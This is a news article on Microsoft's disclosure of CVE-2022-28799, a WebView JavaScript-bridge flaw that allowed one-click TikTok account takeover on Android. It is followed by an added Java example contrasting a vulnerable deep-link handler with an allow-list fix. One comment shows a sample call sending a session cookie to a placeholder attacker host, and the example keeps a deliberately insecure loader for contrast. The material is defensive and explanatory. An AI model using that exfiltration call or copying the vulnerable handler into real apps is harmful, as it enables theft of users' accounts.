Microsoft discovers security flaw in TikTok’s Android app


Last February, Microsoft researchers discovered a security flaw in TikTok's Android app. It could have allowed an attacker to hijack a user's account once the user clicked a single malicious link.

Fortunately, developers at ByteDance, TikTok's parent company, patched the vulnerability quickly after being made aware of it. Microsoft researchers reported it last February through the bug bounty program, according to Dimitrios Valsamaras, a researcher with the Microsoft 365 Defender Research Team.

The security flaw is now tracked as CVE-2022-28799. With a fix available, Microsoft is urging all TikTok users on Android to update their app to the latest version.

Vulnerable all over the world

This is a nasty flaw in a JavaScript interface exposed through a WebView component of the TikTok Android app, which has been downloaded 1.5 billion times from the Google Play Store. WebView is the Android component that lets applications written in Java or Kotlin render web content inside the app itself.

“Prior to version 23.7.3, the TikTok app for Android allows [an attacker] to take control of an account. (…) It could take advantage of an attached JavaScript interface for one-click takeover,” reads the CVE-2022-28799 entry.

In a blog post, Dimitrios Valsamaras notes that there are two versions of the TikTok app on Android. One (with package name com.ss.android.ugc.trill) is for East and Southeast Asia and the other (with package name com.zhiliaoapp.musically) is intended for other regions. Both contain this vulnerability.

Update

“We commend the efficient and professional resolution of TikTok’s security team. TikTok users are encouraged to ensure they are using the latest version of the app,” writes Dimitrios Valsamaras.

The vulnerability stems from the way TikTok developers implemented the app's JavaScript interfaces in WebView. Such an interface (registered with WebView.addJavascriptInterface()) provides “bridge functionality”: JavaScript code running in a loaded web page can invoke specific Java methods of a particular class in the application.

“Loading untrusted web content into WebView with application-level objects accessible through JavaScript code makes the application vulnerable to JavaScript interface injection, which can lead to data leakage, data corruption or, in some cases, arbitrary code execution,” explains the researcher.

Android specific

However, the real vulnerability lies in the way the TikTok app handles a particular “deep link” on Android, according to Dimitrios Valsamaras. Deep links let developers route a user straight to a chosen component of an application. When a user clicks a deep link, the Android package manager checks all installed apps to see which one can respond to it, then routes the link to the component declared as its handler.

TikTok's implementation of JavaScript interfaces in the app determined the impact of the vulnerability.

“In examining the app's handling of a specific deep link, we discovered several issues that, when chained together, could have been used to force the app to load an arbitrary URL in the app's WebView,” writes the researcher.

“More than 70 methods exposed”

Microsoft found “more than 70 exposed methods” by enumerating the functionality accessible to JavaScript code in web pages loaded in the WebView. Combined with the arbitrary URL load, these exposed methods give an attacker the means to view and modify users' private data.

By invoking these methods, the attacker can retrieve the user's authentication tokens by triggering a request to an attacker-controlled server and capturing the request's cookies and headers. The attacker can also retrieve or modify data in the user's TikTok account, such as private videos and profile settings.

“In short, by controlling one of the methods capable of making authenticated HTTP requests, a malicious actor could have compromised a TikTok user account,” warns the researcher.

Bad idea

More generally, Microsoft considers developers' use of JavaScript interfaces a bad idea that carries significant risk: compromising such an interface can allow an attacker to execute code with the identity and privileges of the app. Microsoft has previously detailed flaws caused by JavaScript interfaces in several popular Android apps.

Microsoft recommends that developers instead use an “approved list of trusted domains to load into the app’s WebView to prevent malicious or untrusted web content from being loaded.”
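The pattern behind the deep-link issue and the allow-list fix, as an added Java example written for this page (it is not TikTok's, ByteDance's or Microsoft's code, and the article does not disclose TikTok's actual implementation). The package, class and method names, the `myapp://open?url=` deep-link shape, the `window.native` bridge name, the cookie value and the trusted hosts are all assumptions made for illustration. The vulnerable handler loads whatever URL the deep link carries with the bridge attached; the hardened handler only honours exact-match https hosts from the allow-list, and a small reflection helper shows how to count the bridge methods a page's JavaScript can reach.

```java
// Added illustration, not TikTok's or Microsoft's code. Package, class, method
// and host names are assumptions chosen for this example.
package com.example.bridgedemo;

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;

import java.lang.reflect.Method;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashSet;
import java.util.List;
import java.util.Set;

public class DeepLinkWebViewActivity extends Activity {

    // Object exposed to page JavaScript as window.native. Every public method
    // annotated @JavascriptInterface is callable by ANY page the WebView loads.
    static final class NativeBridge {
        private final String sessionCookie;

        NativeBridge(String sessionCookie) {
            this.sessionCookie = sessionCookie;
        }

        // An authenticated request on the user's behalf. A malicious page can call
        //   window.native.fetchWithSession("https://attacker.example/collect")
        // and the app itself ships the session cookie to the attacker's server.
        @JavascriptInterface
        public int fetchWithSession(String url) throws Exception {
            HttpURLConnection conn = (HttpURLConnection) new URL(url).openConnection();
            conn.setRequestProperty("Cookie", sessionCookie);
            return conn.getResponseCode();
        }
    }

    // Hosts the app may render with the bridge attached (assumed values).
    static final Set<String> TRUSTED_HOSTS = Collections.unmodifiableSet(
            new HashSet<>(Arrays.asList("www.example.com", "m.example.com")));

    // True only for https URLs whose host is exactly on the allow-list.
    // Exact matching matters: endsWith("example.com") would accept
    // "evilexample.com", and skipping the scheme check would accept
    // javascript:, file: and intent: URLs that also reach the bridge.
    static boolean isTrustedUrl(String candidate) {
        if (candidate == null) return false;
        Uri uri = Uri.parse(candidate);
        String host = uri.getHost();
        return "https".equals(uri.getScheme())
                && host != null
                && TRUSTED_HOSTS.contains(host.toLowerCase());
    }

    // VULNERABLE pattern: the deep link myapp://open?url=<anything> decides what
    // the WebView loads, and the bridge is attached unconditionally.
    static void loadFromDeepLinkVulnerable(Intent intent, WebView webView, String cookie) {
        Uri link = intent.getData();
        String target = link == null ? null : link.getQueryParameter("url");
        if (target == null) return;
        webView.getSettings().setJavaScriptEnabled(true);
        webView.addJavascriptInterface(new NativeBridge(cookie), "native");
        webView.loadUrl(target);
    }

    // HARDENED pattern: the same deep link is honoured only for allow-listed
    // https hosts; anything else is refused before the bridge ever exists.
    static void loadFromDeepLinkHardened(Intent intent, WebView webView, String cookie) {
        Uri link = intent.getData();
        String target = link == null ? null : link.getQueryParameter("url");
        if (!isTrustedUrl(target)) {
            webView.loadUrl("about:blank");
            return;
        }
        webView.getSettings().setJavaScriptEnabled(true);
        webView.addJavascriptInterface(new NativeBridge(cookie), "native");
        webView.loadUrl(target);
    }

    // Audit helper: enumerate the bridge surface a page's JavaScript can reach,
    // the kind of count behind "more than 70 exposed methods".
    static List<String> exposedMethods(Class<?> bridgeClass) {
        List<String> names = new ArrayList<>();
        for (Method m : bridgeClass.getMethods()) {
            if (m.isAnnotationPresent(JavascriptInterface.class)) {
                names.add(m.getName());
            }
        }
        return names;
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView webView = new WebView(this);
        setContentView(webView);
        // "session=..." stands in for whatever token store a real app uses.
        loadFromDeepLinkHardened(getIntent(), webView, "session=REDACTED");
    }
}
```

For the deep link to reach this activity at all, the app declares an intent-filter for the `myapp` scheme in its manifest; that declaration is what the package manager consults when it routes the clicked link. Two caveats a reviewer would add: the allow-list protects against loading an attacker's page, but an XSS bug on a trusted host still reaches the same bridge, so the exposed surface (`exposedMethods(NativeBridge.class)` returns just `fetchWithSession` here) should stay as small as possible; and if a bridge method must make authenticated requests, it should pin the destination host itself rather than accept an arbitrary URL from JavaScript.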

Google has also released a page for Android app developers to address JavaScript interface injection vulnerabilities.

Source: ZDNet.com